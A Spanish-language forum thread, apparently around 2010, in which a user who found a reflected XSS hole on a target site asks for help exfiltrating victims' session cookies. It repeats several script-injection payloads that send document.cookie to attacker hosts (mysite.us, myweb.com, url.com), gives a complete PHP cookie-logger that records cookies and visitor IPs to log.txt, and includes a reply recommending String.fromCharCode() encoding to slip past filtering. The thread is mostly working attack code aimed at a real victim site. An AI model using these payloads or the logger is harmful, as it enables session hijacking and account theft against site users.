Encontre un bug de xss en una pagina web al poner  "><scritp>alert(document.cookie)</script> me da la cookie perfectamente pero al hacer esto

"><scritp>window.location="http://mysite.us/c.php?cookie="+document.cookie;</script>

no me caputara la cookie ya intente mandar solo a la web y lo hace perfectamente el problema esta parece que no me concatena el document.cookie alguna ayuda!!!

De hecho si pido disculpa no me di cuenta por ponertlo aqui.

"><script>document.location="http://mysite.us/c.php?cookie="+ document.cookie;</script>

ya tambien lo e tratado y nada.

Shell Root

"><script>document.location='http://mysite.us/c.php?cookie='+ document.cookie;</script>

Tampoco funciono!! no me manda al link es como que no concatena la intruccion del javascript es decir al poner esto en address bar

http://url_victima.com/empty_personal.phtml?r="><script>window.location='http://myweb.com/c.php?cookie='+document.cookie;</script>

no me manda a la pagina web del javascript a donde esta el cookie stealer pero si le quito la concatanacion es decir  
URL + document.cookie;

http://url_victima.com/empty_personal.phtml?r="><script>window.location='http://myweb.com/c.php?cookie=';</script>

funciona entoces el problema esta en el + document.cookie; que no me concatena.

http://vitima.com/01109417885/empty_personal.phtml?r="><script>selft.location='http://mypage.com/c.php?cookie='+document.cookie;</script>

Nada no funciona y sigue pasando lo mismo si le quito el + document.cookie funciona normal.

Ps bueno ya tengo la solución, estaba probando lo y lo solucione con la función String.fromCharCode() de javascript. ok bueno mira.

Primero vamos encodear el codigo javascript a ASCII , que sera este:Ahora sera:

Entonce la XSS quedara asi

Solo ponerlo en el navegador y te redireccionara a google, puedes usar esta herramienta online para que encodes tu codigo a ASCII:
Herramienta

Saludos espero que funcione.

chmod 777 c.php
PHP SCRIPT:

<?php
$cookie = urldecode($_GET['c']);
$fp = fopen("log.txt", "a");
$cookie = $cookie . ": ".$_SERVER['REMOTE_ADDR']." at ".date("r",time())."\n";
fwrite($fp, "$cookie \n");
fclose($fp);
header("Location: http://google.com ");
?>

XSS BUG URL:

http://victima.com?r="><script>selft.location='http://url.com/c.php?c='+document.cookie;</script>

LOG.TXT:

pero si pongo

http://victima?r="><script>selft.location='http://url.com/c.php?c=';</script>

LOG.TXT:
: x.x.x.x at Wed, 10 Feb 2010 10:56:34 -0400

Gracias!

no creo q te convenga poner la url original.. :S cambiala por ****

Tranquilo man, anda y usa String.fromCharCode(), aveces es mejor que pongas la url.